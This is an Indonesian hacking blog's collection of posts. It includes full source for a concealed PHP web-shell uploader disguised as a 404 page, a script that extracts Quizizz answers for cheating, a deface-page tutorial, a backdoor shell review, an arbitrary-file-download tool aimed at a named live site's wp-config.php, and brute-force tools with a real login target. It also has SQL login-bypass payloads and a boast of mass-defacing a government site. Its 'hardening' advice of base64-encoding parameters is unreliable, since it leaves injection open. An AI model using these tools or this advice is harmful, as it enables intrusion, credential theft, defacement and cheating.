Showing posts with label Programmer. Show all posts
Showing posts with label Programmer. Show all posts

Borland Delphi 7 Enterprise Terbaru Full adalah pengembangan lingkungan terpadu yang kuat (IDE) yang dikembangkan oleh Borland,bekerja untuk konsol, desktop,web,dan aplikasi mobile.Alat pengembangan aplikasi yang cepat ini mandiri, bekerja sama dengan beberapa platform seperti sistem Windows (32-bit/64-bit),Mac OS X,iOS dan Android. Borland Delphi 7 Enterprise Terbaru Full adalah kompiler profesional untuk bahasa pemrograman Pascal,seperti Visual Basic software ini menyediakan fasilitas yang lengkap untuk membuat aplikasi visual.Borland Delphi 7 Enterprise Terbaru Full adalah salah satu IDE yang paling sukses diciptakan oleh Borland karena stabilitas dan persyaratan perangkat keras rendah.Ini memberikan kemudahan menggunakan kode pemrograman, penggunaan beberapa file Unit untuk pemrograman modular, kompilasi cepat, desain menarik dan diperkuat dengan bahasa pemrograman terstruktur.

Borland Delphi 7 Enterprise Terbaru Full merupakan salah satu Aplikasi pemrograman yang berfungsi sebagai software pembuat aplikasi yang berekstensi windows [.exe ].Borland Delphi 7 Enterprise Terbaru Full ini juga sering digunakan oleh bangsa pemrograman yang hobi unutuk membuat aplikasi atau games yang berjenis file.exe,jadi apabila anda ingin membuat kreasi seperti aplikasi,software,inject dan sebagainya yang bersangkutan dengan perangkat lunak komputer dan smarphone anda bisa gunakan software aplikasi Borland Delphi 7 Enterprise Terbaru Full ini.

Fitur-fitur Delphi 7 Enterprise: 

  1. Membuat aplikasi client dengan mudah
  2. Support sistem 32bit dan 64bit
  3. Hasil compile yang ringan dan kecil
  4. Mudah menggunakannnya. 
  5. Dan fitur lainnya

Bagi Kalian yang berminat untuk mendownloadnya/mengunduhnya silahkan KLIK DISINI untuk menuju ke halaman pengunduhan.











-

Hai sobat

Saya ikal,

Disini saya akan share sesuatu nih.

-


Sudah lumayan lama saya tidak membuat artikel lagi, Ya gitu lah.


Okeh kita langsung saja masuk kepembahasan.


Untuk tampilannya kira - kira seperti gambar dibawah ini : 



Nah untuk tampilannya sangat sederhana yah. Namun yang membuatnya menarik bukan itu :D. Oke kita ke fiturenya.


Fiture :

  1. Hidden.
    •  Use get method.
    •  Use Session (Cookies).
    •  Tampilan 404 sebelum memanggil request GET.
  2. Get System.
  3. Get PHP Version.
  4. Get Server name.
  5. dll

 

Sedikit detail lagi nih, 

- Jadi saat kalian belum memanggil requestan getnya, uploader akan berpenampilan 404, Tampilan 404 nya beragam, atau bisa dibilang (Menyesuaikan dengan tampilan 404 server target kalian).

- Dan cara memanggil uploadernya cukup mudah, 

Example : https://localhost/uploader.php?1337=1337

- Karena ini menggunakan session, jadi jika kalian sudah pernah memanggil uploadernya sekali, kalian tidak perlu mengaksesnya lagi menggunakan get methode. Kecuali jika kalian membersihkan cache browser :D.


Source Code : 


<?php
  error_reporting(0);
  ini_set('max_execution_time',0);
  session_start();
  $name="1337";
  function login() { 
    $random_url = mt_rand(1000000, 247345736453);
    $curl = curl_init();
    $protocol = 'http://';
    if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') { $protocol = 'https://'; }
    curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $server_404 = curl_exec($curl);
    $server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
    $server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
    echo $server_404;
    exit;
  }
  if (!isset($_SESSION[md5($sexy)]))
    if (isset($_GET[$name]) && ($_GET[$name] == $name))
      $_SESSION[md5($sexy)] = true;
  else login();
?>
<?php
echo"
<meta name='theme-color'content='#000000'>
<style>
body{
	background:#202020;
	color:#00D5C6;
	text-align:center;
	font-family:Arial;
}
</style>";
$uname = php_uname();
$serversoftware = $_SERVER['SERVER_SOFTWARE'];
$servername = $_SERVER['SERVER_NAME'];
$serverip = $_SERVER['SERVER_ADDR'];
$safemode = ini_get('safe_mode') ? "Enabled" : "Off";
$openbasedir = ini_get('open_basedir') ? "Enabled" : "Off";
$disabledfunc = ini_get('disable_functions');
$phpversion = phpversion();
$domain = $_SERVER['HTTP_HOST'];
echo "<br><br><center>";
echo"
<font color='white'><h1>SANTUY PEOPLE </h1>
<img src='https://img.shields.io/badge/Version-1.1.1-brightgreen.svg?style=style=flat-square' alt='version'>
<br><p align='left'>
		System:<font color='lime'>	$uname </br></font>
		PHP Version:<font color='lime'>$phpversion<br></font>
		Server Name:<font color='lime'>$servername </font><br>
		Server IP:<font color='lime'>$serverip<br></font>
		safe_mode:<font color='lime'>$safemode<br></font>
		open_basedir:<font color='lime'>$openbasedir<br></font>
		Disabled Functions:<font color='lime'>$disabledfun<br></font>
";    
echo "<center><form method='post' enctype='multipart/form-data'>
<input type='file' name='x'><input type='submit' name='upload' value='upload'>
</form>";
if($_POST['upload']) {
	if(@copy($_FILES['x']['tmp_name'], $_FILES['x']['name'])) {
	echo "Failed";
	} else {
	echo "Success";
	}
	}
?>


Nah segini saja tutorial kali ini, kurang lebihnya biarkan saja :D. 


Thanks

See U

 
-

Hai sobat.

Saya ikal,

Disini saya akan share sesuatu nih.

-


Sesuai yang ada pada judul, kali ini kita akan membahas cara mengetahui seluruh jawaban dari quiz yang dibuat diwebsite online bernama quizizz.com.


Trik ini saya dapat dari teman saya, dia sudah mempublish trik ini diblog pribadinya sendiri, nanti linknya saya akan cantumkan diakhir artikel :D.


Langsung saja kita mulai pembahasannya, Disini saya jelaskan cara melakukan trik ini hanya untuk di Mobile/HandPhone.


a). Mengaktifkan Future inspect element.

Masuk kedalam room quizizz, lalu klik tombol pause dipojok kiri atas, tenang soal akan terpause, tidak akan ada yang terlewat satupun. Jika sudah mengpause, kalian aktifkan future inspect element.


Untuk yang belum tau cara melakukan Inspect element di Mobile/HandPhone, kian bisa baca artikel ini www.draxploit.web.id


b). Penerapan.

Jika Future inspect element sudah muncul, kalian klik kembali tombol pause nya, lalu klik kotak future inspect elementnya. Maka tampilan akan seperti gambar dibawah ini.



Nah, jika sudah seperti itu, kalian salin kode dibawah ini.




var x = document.createElement("link");
x.rel = 'stylesheet';
x.type = 'text/css'
x.href = "https://cdn.jsdelivr.net/gh/EastArctica/JS-Plugins@master/Un-Released/Kahoot/KahootModal.css"
document.head.appendChild(x);

var xhttp = new XMLHttpRequest()
var URL = window.location.href
var found = URL.search("https://quizizz.com/join/game/");
if (found == 0) { found = true }
if (found) {
    var Modal = document.createElement("div")
    Modal.id = "mainModal"
    Modal.className = "mainModal"
    Modal.style = "position: fixed; z-index: 2147483647; left: 0px; top: 0px; width: 100%; height: 100%; overflow: auto; background-color: rgba(0, 0, 0, 0.4); display: none;"
    var ModalContent = document.createElement("div")
    ModalContent.className = "modal-content"
ModalContent.id = "ModalContent"
    var Close = document.createElement("span")
    Close.className = "close"
    Close.innerHTML = "×"
    var btn = document.createElement("button")
    btn.id = "ModalButton"
    btn.innerText = "View Answers"
    btn.onclick = function() {
        Modal.style.display = "block";
    }
    Close.onclick = function() {
        Modal.style.display = "none";
    }
    window.onclick = function(event) {
        if (event.target == Modal) {
            Modal.style.display = "none";
        }
    }
    document.getElementsByClassName("actions-container")[0].appendChild(btn)
    ModalContent.appendChild(Close)
    Modal.appendChild(ModalContent)
    document.getElementsByClassName("root-bootstrapper-container")[0].prepend(Modal)
if (!window.idiidk) {
window.idiidk = function() {
const offset = 33;
class Encoding {
static encode(t, e, o = 2) {
const s = this.encodeRaw(e, !0);
return `${s}${this.encodeRaw(t,!1,e)}${String.fromCharCode(33+s.length)}${o}`
}
static encodeRaw(t, e, o = "quizizz.com") {
let s = 0;
s = e ? o.charCodeAt(0) : o.charCodeAt(0) + o.charCodeAt(o.length - 1);
const r = [];
for (let o = 0; o < t.length; o++) {
const n = t[o].charCodeAt(0),
c = e ? this.safeAdd(n, s) : this.addOffset(n, s, o, 2);
r.push(String.fromCharCode(c))
}
return r.join("")
}
static decode(t, e = !1) {
if (e) {
const e = this.extractHeader(t);
return this.decodeRaw(e, !0)
} {
const e = this.decode(this.extractHeader(t), !0),
o = this.extractData(t);
return this.decodeRaw(o, !1, e)
}
}
static decodeRaw(t, e, o = "quizizz.com") {
const s = this.extractVersion(t);
let r = 0;
r = e ? o.charCodeAt(0) : o.charCodeAt(0) + o.charCodeAt(o.length - 1), r = -r;
const n = [];
for (let o = 0; o < t.length; o++) {
const c = t[o].charCodeAt(0),
a = e ? this.safeAdd(c, r) : this.addOffset(c, r, o, s);
n.push(String.fromCharCode(a))
}
return n.join("")
}
static addOffset(t, e, o, s) {
return 2 === s ? this.verifyCharCode(t) ? this.safeAdd(t, o % 2 == 0 ? e : -e) : t : this.safeAdd(t, o % 2 == 0 ? e : -e)
}
static extractData(t) {
const e = t.charCodeAt(t.length - 2) - 33;
return t.slice(e, -2)
}
static extractHeader(t) {
const e = t.charCodeAt(t.length - 2) - 33;
return t.slice(0, e)
}
static extractVersion(t) {
if ("string" == typeof t && t[t.length - 1]) {
const e = parseInt(t[t.length - 1], 10);
if (!isNaN(e)) return e
}
return null
}
static safeAdd(t, e) {
const o = t + e;
return o > 65535 ? o - 65535 + 0 - 1 : o < 0 ? 65535 - (0 - o) + 1 : o
}
static verifyCharCode(t) {
if ("number" == typeof t) return !(t >= 55296 && t <= 56319 || t >= 56320 && t <= 57343)
}
static generateIdentifier(t, e, o = 1, s = (new Date).getTime()) {
let r = e;
return "function" == typeof e && (r = e()), "".concat(t, ".").concat(r, "|").concat(o, ".").concat(s)
}
}
var URL = window.location.href 
var GameType = URL.slice(URL.search("gameType=")+9, URL.length)
const prevConx = localStorage.getItem("previousContext"),
parsedConx = JSON.parse(prevConx),
encodedRoomHash = parsedConx.game.roomHash,
roomHash = Encoding.decode(encodedRoomHash.split("-")[1]),
data = {
roomHash: roomHash,
type: GameType
};
fetch("https://game.quizizz.com/play-api/v3/getQuestions", {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify(data)
}).then(t => t.json()).then(t => {
let e = 0;
for (const o of Object.keys(t.questions)) {
e++;
const s = t.questions[o],
r = s.structure.kind,
n = s.structure.answer,
c = Encoding.decode(n);
ModalContent.insertAdjacentHTML( 'beforeend', `Question: `)
ModalContent.insertAdjacentHTML( 'beforeend', `${s.structure.query.text}
`)
if (c[0] == "[") {
newc = c.slice(1, c.length-1)
newc = newc.split(",");
// c has been turned into an array :)
ModalContent.insertAdjacentHTML( 'beforeend', `Answers:
`)
for (let i = 0; i < newc.length; i++) {
ModalContent.insertAdjacentHTML( 'beforeend', `${s.structure.options[Number(newc[i])].text || s.structure.options[Number(newc[i])].media[0].url} 
`)
}
ModalContent.insertAdjacentHTML( 'beforeend', `
`)
} else {
//console.log(s.structure)
    ModalContent.insertAdjacentHTML( 'beforeend', `Answer: ${s.structure.options[c].text || s.structure.options[c].media[0].url} 

`)
}
}
});
}
window.idiidk();
} else {
window.idiidk();
}
}

Jika sudah menyalin kode diatas, kalian tinggal mengklik tanda yang ditunjuk digambar dibawah ini.


Lalu pastekan yang kalian salin tadi disana.


Jika sudah dipastekan, kalian klik Execute.


Nah, jika sudah muncul kotak yg bertulis View Answer, itu berarti sudah berhasil. Kalian tinggal klik kembali kotak future inspect elementnya. Dan tinggal mengklik kotak yg bertulis view answer tadi, lalu jawab soal - soal yang ada sesuai dengan jawaban yg tertampil di kotak View Answer.

Nah segitu saja artikel kali ini, jika ada yang kurang atau salah kata biarkan saja :D.

Referensi : 
 
Thanks 
See U

Membuat Script Deface - untuk deface website

Add caption
Hai Exploiters kembali lagi bersama saya Mr.Stay24Hacker's.

Seperti biasa disini di blog ini, saya akan memberikan sebuah informasi-informasi atau sebuah tutorial-tutorial yang mungkin akan bermanfaat untuk kalian.

Pada kesempatan kali ini saya akan memberikan tutorial bagaimana cara membuat script deface untuk deface website.

mungkin diantara kalian sudah tau jika kita mau deface website harus mempunyai script deface nya. disini saya akan memberikan bagaimana cara membuat script deface nya hhe.

Disini kita membuat script deface menggunakan HTML dan juga CSS, Itung itung kita membuat script deface ini sambil belajar bahasa pemrograman. Tapi HTML Bukan hahasa pemrograman oke, HTML Adalah Bahasa Markup. Jika kalian ingin mengetahui lebih jauh tentang HTML kalian bisa belajar karna HTML mudah.

Alat yang diperlukan

Untuk membuat script deface, kalian juga membutuh kan alat-alat dan kebutuhanya.
alat yang kalian perlukan untuk membuat code script deface adalah text editor, kalian bebas bisa memakai aplikasi text editor apa saja, kalian bisa mendownload nya di google play store.

Disini saya menggunakan AnWriter Free untuk membuat code HTML.

Logo aplikasi AnWriter
diatas adalah logo aplikasi anwriter jika kalian bingung mencari nya dimana, kalian cari saja di playstore, Dengan aplikasi logo seperti itu ( Jika kalian ingin menggunakan aplikasi seperti saya. )

Step To Create

Oke sekarang kita sudah tau bahan apa saja yang kita perlukan, Sekarang saatnya kita membuat souce kode script deface, Disini saya anggap kalian sudah mendownload bahan untuk membuat script deface nya.

Pertama kita buka dulu aplikasi anwriter nya.
Anwriter Free
Nah kira kira kita akan mendapatkan tampilan seperti itu saat pertama kali membuka aplikasinya.

selanjut nya kalian save dulu file yang akan kalian buat dengan klik tombol save diatas kanan yang bergambarkan Memori.

Anwriter Free
Nah setelah kalian masuk kedalam sini kalian bebas mau menyimpan script deface kalian dimana, Jangan lupa beri nama script yang akan kalian buat, Seperti contoh saya memberikan nama script saya seperti di gambar diatas.

Jika sudah kalian klik save, maka akan automatis kembali ke halaman utama saat pertama kali membuka aplikasi.

Coding Script

Karna jika dijelaskan secara rinci membuat script deface, kemungkinan besar artikel ini akan panjang hhe.

jadi saya disini akan  menjelaskanya sedikit saja, yang penting kalian paham bagaimana membuat script deface.

Source Code
Kalian ketikan dulu Code diatas jangan sampai ada yang terlewat oke, kode diatas adalah kode Awalan untuk membuat script Deface.

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>

</body>
</html>

Kalian bisa mencopy nya.

Selanjut nya kalian isi Nama kalian pada.

<title> Nama kalian </title>

Title berguna untuk memberikan judul pada halaman yang akan kita deface nanti.

Contoh Title
Gambar diatas adalah contoh title yang kita isi tulisan Pwndz itu adalah tulisan title. jika kalian menuliskan nama kalian maka akan berbeda lagi.

Source Code 2
Nah jika sudah kalian tuliskan lagi source code diatas. 

<!DOCTYPE html>
<html>
<head>
<title>Pwndz</title>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
</head>
<body>
<center><img src="https://i.ibb.co/hFkdnK9/netclipart-com-bleeding-clipart-1202413.png" width="220px" height="245px"></center>
<center><h1>Hacked By Mr.Stay24Hacker's</h1></center>
<center><h2>Bandung6etar Team</h2></center>
<center><p>Shootz : DragonXploit</p></center>
</body>
</html>

Jika kurang jelas kalian bisa melihat code diatas, Lebih baik kalian tulis satu persatu agar kalian paham.

Disini saya akan memberikan Apa saja kegunaan nama nama tag code diatas

<h1> : h1 itu untuk menuliskan tulisan besar ke tampilan script deface.

Contoh
Ouh iya disini saya menggunakan gambar saya akan jelaskan

Kembali ke h1 bisa dilihat tulisan besar Hacked By Mr.Stay24Hacker's yaa itu adalah hasil dari tag <h1>.

<h2> : sama seperti h1, h2 juga memiliki fungsi yang sama seperti h1, yaitu untuk menuliskan tulisan di halaman script deface.

*Lihat kembali ke gambar diatas ada tulisan yang bertulisan Bandun6etar Team Itu hasil dari tag <h2>

<p> : tag <p>, fungsinya adalah untuk paragraf kalian mungkin sudah tau apa kegunaan paragraf bisa dilihat di tulisan Shootz : DragonXploit itu adalah tulisan paragraf lebih kecil dari yang lainya.

<center> ; tag <center> berguna agar semua content yang kita buat berada di tengah.

<img> : tag <img> adalah tag untuk gambar, seperti contoh diatas ada gambarnya karna menggunakan tag <img>. dan didalamnya dimasukan link gambar yang kalian ingin tampilkan.

Contoh <img src="linkgambar.com/gambar.jpg>

Kalian jika ingin menggunakan nama kalian dan juga gambar kalian, kalian bisa ubah gambar dan juga tulisanya lalu kalian coba jalankan guys.

kalian bisa melihat script deface saya yang saya bikin, tapi saya mempercantiknya lagi dengan CSS dan memakai lagu supaya lebih menarik hhe

hasil pembuatanya bisa dilihat disini gays : 


oke mungkin segitu saja penjelasanya, Bisa dibilang ini cuman belajar dasar nya dulu membuat script deface, mungkin kedepanya saya akan membuat artikel bagaimana cara mempercantiknya.

kalian ingin belajar membuat script deface lebih lanjut? kalian belum paham?

bisa komen dibawah guyss!!!!

 -Mr.Stay24Hacker's

 

-

Hai sobat.

Saya ikal,

Disini saya akan share sebuah trik nih

-


Sesuai judul kali ini kita akan membahas sebuah trik untuk sedikit memperketat sebuah keamanan website berbasis PHP dan MySQL. 


Trik ini hanya perlu mengencode bagian parameter atau bahkan variable yang sering digunakan para Injector untuk melakukan exploitasi, dan mungkin kalian butuh trik yang saya buat ini :D. Langsung saja.


1. Akses lebih

yang pertama kalian harus mempunyai akses lebih kedalam website, agar kalian bisa melakukan edit,rename,delete  dan lainnya kepada sebuah file yang ada, mungkin melalui cpanel,or backdoor kalian bisa melakukan trik ini.


2. Mengedit script

nah jika kalian sudah mendapatkan akses lebih kedalam server, kalian hanya perlu mengedit isi file yang merupakan yang terdapar parameter dan variable yang ada.

Default : 


<?php

          $id = $_GET['id'];

  $sql = "SELECT * FROM enuo_content WHERE id='$id'";

  $res = $db->query($sql);

  $row = $db->getarray($res);

   ?>


Script tersebut masih normal dan belum diubah atau masih default.

Sekarang mari kita coba edit agar nilai yang dihasilkan berupa encoding.


Edit seperti ini : 


<?php

          $id = base64_decode($_GET['id']);

  $sql = "SELECT * FROM enuo_content WHERE id='$id'";

  $res = $db->query($sql);

  $row = $db->getarray($res);

   ?>


Maka inputan yang keluar adalah seperti ini : 

$id = base64 -> nilai dari $id


Bagaimana kalau kita tambah menjadi dua atau tiga kali :D.


<?php

          $id = base64_decode(base64_decode(base64_decode($_GET['id'])));

  $sql = "SELECT * FROM enuo_content WHERE id='$id'";

  $res = $db->query($sql);

  $row = $db->getarray($res);

   ?>

 

Maka hasil inputan seperti ini : 

$id = base64 -> base64 -> base64 -> nilai dari $id


Xixixi Injector akan merasa malas menginject websitemu, bila encodean sampai dua kali atau lebih :D.


Belum puas melihat injector tersiksa? Coba cara ini. Script diatas hanya mengencode nilai yang ada dari $id bagaimana kalau $id kita lakukan encode juga :D. Let's try.


 <?php

          $key = sha1('id');

          $id = $_GET[$key];

  $sql = "SELECT * FROM enuo_content WHERE id='$id'";

  $res = $db->query($sql);

  $row = $db->getarray($res);

   ?>

Atau 

 <?php

          $key = base64_encode('id');

          $id = $_GET[$key];

  $sql = "SELECT * FROM enuo_content WHERE id='$id'";

  $res = $db->query($sql);

  $row = $db->getarray($res);

   ?>


Maka hasil yang masuk seperti ini

sha1 -> $id = nilai dari $id  

atau 

base64 -> $id = nilai dari $id


bagaimana jika kita persulit lagi :D.


<?php

          $key = sha1('id');

          $id = base64_decode(base64_decode($_GET[$key]));

  $sql = "SELECT * FROM enuo_content WHERE id='$id'";

  $res = $db->query($sql);

  $row = $db->getarray($res);

   ?>

Atau 

 <?php

          $key = base64_encode('id');

          $id = base64_decode(base64_decode($_GET[$key]));

  $sql = "SELECT * FROM enuo_content WHERE id='$id'";

  $res = $db->query($sql);

  $row = $db->getarray($res);

   ?>

 

Maka hasilnya seperti ini

sha1 -> $id = base64 -> base64 -> nilai dari $id

Atau 

base64 -> $id = base64 -> base64 -> nilai dari $id


"bang kok sha1 ama base64 doang?" bisa kok yang lainnya, tinggal ganti-ganti aja.


Nah segini aja artikel kali ini

Thanks

See u


-
Hai sobat.
Saya ikal,
Disini saya akan share sebuah script php keren nih
-

Sesuai judul. Kali ini kita akan mereview sebuah php script yang bertujuan sebagai shell backdoor (kerang) :D.

Shell ini cukup unik walau sangat sederhana dari segi tampilan dan feature, karena shell kali ini sama seperti kita memainkan sebuah terminal. 

Langsung saja.

Tampilan : 


Feature : 

- History command (menggunakan tombol panah ↑ ↓).
- Pelengkapan otomatis nama perintah dan file (menggunakan Tabkunci).
- Menavigasi di sistem file jarak jauh (menggunakan cdperintah).
- Unggah file ke server ( upload <destination_file_name>perintah usig ).
- Unduh file dari server (menggunakan download <file_name>perintah).

Github link : 
https://github.com/flozz/p0wny-shell/blob/master/shell.php

Example : 
http://sijiali.org/p0wn.php

WARNING: THIS SCRIPT IS A SECURITY HOLE. DO NOT UPLOAD IT ON A SERVER UNTIL YOU KNOW WHAT YOU ARE DOING!

Thanks
See u

 

-

Hai sobat.

Saya ikal,

Disini saya akan share sebuah script python keren nih

-


Sesuai judul, jadi kali ini kita akan membahas arbitrary file download lagi. 


Jadi script ini dibuat oleh MrCl0wnLab dan sudah ada digithub. Dan ini berimpak kepada semua plugins dan themes wordpress yang rentan terhadap arbitrary file download.


Langsung saja kita masuk ketahap pembahasan.


1. Tahap penginstalan.

Pertama kita akan mencoba clone link githubnya ke terminal kita masing-masing.


$apt update && apt upgrade && pkg install git python -y

$git clone https://github.com/MrCl0wnLab/afdWordpress && cd afdWordpress && pip install requests

 

Sekarang kita jalankan toolsnya.


$python afd.py --url https://localhost/ --threads 50 --file /wp-config.php


Ganti https://localhost/ dengan target wordpress kalian.


$python afd.py --url https://hsvhospitality.com --threads 50 --file /wp-config.php


Tampilan saat tools beroperasi : 



Ada beberapa HTTP respon yang muncul saat menjalankan tools ini. Jika exploit berhasil maka baris exploit yang berhasil akan berwarna hijau dan muncul 200 


Yup! Segini aja.

Thanks

See u

 

-

Hai sobat.

Saya ikal,

Disini saya akan share sesuatu nih.

-


Kali ini kita akan membahas badly source code sebuah WEBAPP berbasis PHP dan MySQL.


Penjelasan lebih detail : 

http://onnocenter.or.id/wiki/index.php/DVWA


Baca aja tuh diwiki mbah Onno :D.

Langsung saja masuk ketahap pembahasan.


1. Damn Vulnerable Web Application (DVWA)

Dvwa ini sangat digemari para tester untuk memperajari beberapa celah keamanan dalam webapp. Webapp satu ini bisa kalian cari dengan menggunakan dork. 


Namun kalian bisa memahami secara rinci dan detail dengan cara menjalankan nya diserver kalian atau dilocalhost.


Tampilan : 



Featured : 

> BruteForce

> Command Injection

> CSRF

> File Inclusion

> File 

> Insecure Captcha

> SQL Injection

     > Blind

> Weak Session IDs

> XSS

     > DOM 

     > Reflected

     > Stored


GitHub link : 

https://github.com/digininja/DVWA


2. Xtreme Vulnerable Web Application (XVWA).

Mirip dengan DVWA, tetapi XVWA memiliki lebih banyak featured untuk dicoba para tester. Dan memiliki design yang libih menarik menurut saya.


Tampilan : 



Featured : 

> SQL Injection

     > Blind

> OS Command Injection

> xPath Injection

> Formula Injection

> PHP Object Injection

> Unrestricted File Upload

> XSS

     > Stored

     > DOM

     > Reflected

> Ssrf / Xspa

> File Inclusion

> Session Flaws

> Insecure Direct Object Reference

> Missing Functional Access Control

> Csrf

> Cryptography

> Redirects & Forwards

> Server Side Template Injection


GitHub link : 

https://github.com/s4n7h0/xvwa


Alert :

Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised.


Yup! Segini Aja.

Thanks

See u


-
Hai sobat
Saya ikal,
Disini saya akan share sesuatu.
-

Jadi kalian pasti sudah mengenal server side includes yah. Atau mungkin kalian belum tau apa itu server side includes? 


Nah, jadi kira kira file ssi tuh extensinya .shtml dan biasanya dipakai untuk menginclude 403 404 file yang ada.

SSI Shell sendiri berarti 
SSI : SERVER SIDE INCLUDES
Shell : Shell backdoor


Itu source dari SSI Shell.
"Cara pakainya gimana bang?" Mudah. Jadi kalian hanya perlu melakukan command² cmd biasa. 

Seperti :
ls -la,wget,whoami,cat,cd,dan lainnya.

Tampilan : 

Sekian tentang pembahasan SSI Shell. Next gw buatin Exploit yang berhubungan Ama Server Side seperti ssrf,ssti,dan SSI injection

Thanks
See u
-
Hai sobat
Saya ikal,
Disini saya akan share cara menutup bug XSS
-

Tentu kalian pasti tau dengan kerentanan satu ini, jadi tidak perlu dijelaskan lagi. Kalian bisa cari sendiri penjelasannya.

Disini saya create subdo dari website dx.
site :
http://tester.draxploit.web.id/GET.php
http://tester.draxploit.web.id/POST.php
Note : itu web buat tester (percobaan) yah, itu emang sengaja di buat bug, jadi kalo ada yang report fix tolol :'v.

Jadi disitu ada yang POST dan GET. 
Codingan php POST yang rentan XSS : 

<form action="" method="post">
<input type="text" name="search" value="search now" />
<input type="submit" value="search" />
</form>
<?php
if (isset($_POST['search'])) 
echo 'tidak ada hasil untuk '.$_POST['search'];
?>

 Codingan php GET yang rentan XSS : 

<?php
$example = $_GET['example'];
  echo $example;
?>

Dan cara menutupnya adalah dengan memakai htmlspecialchars(). Taruh dibagian sesudah echo.

Codingan php POST yang sudah dipatch :

<form action="" method="post">
<input type="text" name="search" value="search now" />
<input type="submit" value="search" />
</form>
<?php
if (isset($_POST['search'])) 
echo 'tidak ada hasil untuk '.htmlspecialchars($_POST['search']);
?>
 
Codingan php GET yang sudah dipatch : 

<?php
$example = $_GET['example'];
  echo htmlspecialchars($example);
?>

Jadi kesimpulannya balut $ yang ada disesudah echo dengan htmlspecialchars

Thanks
See u 
-
Hai Sobat.
Saya ikal
Disini, saya akan share sesuatu
-

Sesuai judul, jadi tanpa lama lama saya akan langsung share saja.

- Bash tools :
https://anonfiles.com/daV7adDdo2/brute_sh

- python tools :
https://anonfiles.com/Zeb2bcD0o9/brute_py 

- wordlist :
https://anonfiles.com/V9V4a4D1o8/indo_txt 

Cara pemakaian : 
- python tools : 
- $cd /sdcard && cd Download && mv brute.py $HOME
- $cd $HOME
- $pkg install python2
- $python2 brute.py -h https://lon-t.online/wp-login.php -u USERNAME -P indo.txt

- Bash tools :
- $cd /sdcard && cd Download && mv brute.sh $HOME
- $cd $HOME
- $pkg install bash
- $chmod 777 brute.sh
- $sed -i -e 's/\r$//' brute.sh
- $./brute.sh
- tempel site
- ketik indo.txt
- masukan username

Note : Sebelum menjalankan tools pindahkan juga wordlist
Memindahkan wordlist :
- $cd /sdcard && cd Download && mv indo.txt $HOME
- $cd $HOME

See u
Thank u


Hai Viewer My Blog.
Yap G Asing Lagi Ama Gw. ikal Orang Tamvan (*_')
Sesuai Judul Yah.
Ok Langsung Saja.
_________________________________________

Artikel Ini  membahas bagaimana cara Patch Bug Bypass Admin atau bypass SQL login.

Bagaimana cara tambal celah Bypass admin?. 

Artikel ini akan membantu anda untuk mempatch bug Bypass admin pada website anda, agar tidak terjadinya Peretasan dengan mengandalkan bug ini. 

Karena jika bug ini terdapat pada website anda?. Maka Akan sangat berbahaya.
Kenapa bisa menjadi bahaya besar?. 
Karena hanya dengan mencari admin page dan Menginjeksi User dan Password dengan code seperti 
~> ' or 1=1 limit 1 -- -+
~> '=' 'or' 

Seseorang yang sangat "Gabutz" dapat mengakses Atau masuk menuju admin panel atau  Dashboard Website anda. Dan di sana seorang peretas dapat Mengubah index, dan lebih berbahaya nya lagi mereka Dapat meng-upload backdoor shell dan mengambil alih Website!!..

Nah jadi teruntuk anda para pengembange
Website. Harus berhati hati dan teliti saat membuat Source code supaya tidak ada bug ini pada website Kalian.

Nah disini gw udah punya source code yang terdapat bug bypass nya.


<?php $message = “”; 
if(isset($_POST[‘submit’])){ 
$username= ($_POST[username]); 
$password = md5($_POST[‘password’]);
$query = “SELECT * FROM admin WHERE username = ‘$username’ and password = ‘$password’ and usertype = ‘1’”; 
$query_result = mysqli_query($con, $query); 
if(mysqli_num_rows($query_result)){ 
$row = mysqli_fetch_assoc($query_result); 
$_SESSION[‘admin_id’] = $row[‘id’]; $_SESSION[‘username’] = $row[‘username’]; header(“location: index.php”); 
}else{ 
$message = “String Lu Kurang Mantep Bozz. Mending Pake Unicode.”; 
} } ?>



Nah dari script di atas apa anda sudah tau dimana Letak source code yang terdapat bug bypass nya?..
Coba anda teliti baik baik di sana tidak ada filter pada User dan Pass hal tersebut lah yang menyebabkan Website anda terdapat bug bypass admin or SQL login!!.


$username= ($_POST[username]); 
$password = md5($_POST[‘password’]);


Yap di sama lah penyebabnya.
Bagaimana cara menambahkan filter pada user dan pass login?..

Di bawah ini bakal gw kasih source code filter nya:


$username = mysqli_escape_string($con,$_POST['username']);
$password = mysqli_escape_string($con,$_POST['password']);


Kita akan mengganti source code yang belum terdapat Filter dengan menambahkan filter nya seperti di bawah Ini :



<?php $message = “”; 
if(isset($_POST[‘submit’])){ 
$username = mysqli_escape_string($con,$_POST['username']);
$password = mysqli_escape_string($con,$_POST['password']);
$query = “SELECT * FROM admin WHERE username = ‘$username’ and password = ‘$password’ and usertype = ‘1’”; 
$query_result = mysqli_query($con, $query); 
if(mysqli_num_rows($query_result)){ 
$row = mysqli_fetch_assoc($query_result); 
$_SESSION[‘admin_id’] = $row[‘id’]; $_SESSION[‘username’] = $row[‘username’]; header(“location: index.php”); 
}else{ 
$message = “String Lu Kurang Mantep Bozz. Mending Pake Unicode.”; 
} } ?>


Dan taraaaa filter telah di tambahkan dan website Telah di patched (tambal)!..

Dan gw dapat website go.id yang terdapat bug ini.
Dan gw mass deface + gw patched bug nya :c.
Tapi udah gw hapus ss nya. Jadi g gw tunjukin :c.

Sekian artikel dan informasi tentang patch bug Bypass admin dan SQL login dari gw.
Silakan request ide buat next artikel di kolom komentar.

Gw ikal cape ngetik.
Assalamualaikum

Ttd: Tn.1K4lL_* Ganz
Supported By Dragon Roar Team



Hai Viewer My Blog.
Yap Gw Haikal Mewakili Si  Chichi Dwi Sebagai CEO Dan Member Di Tim Ini
------------------------------------------------------------------
Bismillah Yah :')

Di Artikel Kali Ini Gw Bakal Share Tentang Md5 Yang Tidak Bisa Di Decryt.

Jadi Md5 Itu Termasuk Hash Kriptografik Ya.
Terus Banyak Orang Yang Bilang Kalo Md5 Hash Ajakan Pake Hashkiller?.. Tapi Nyatanya Tidak Loh.

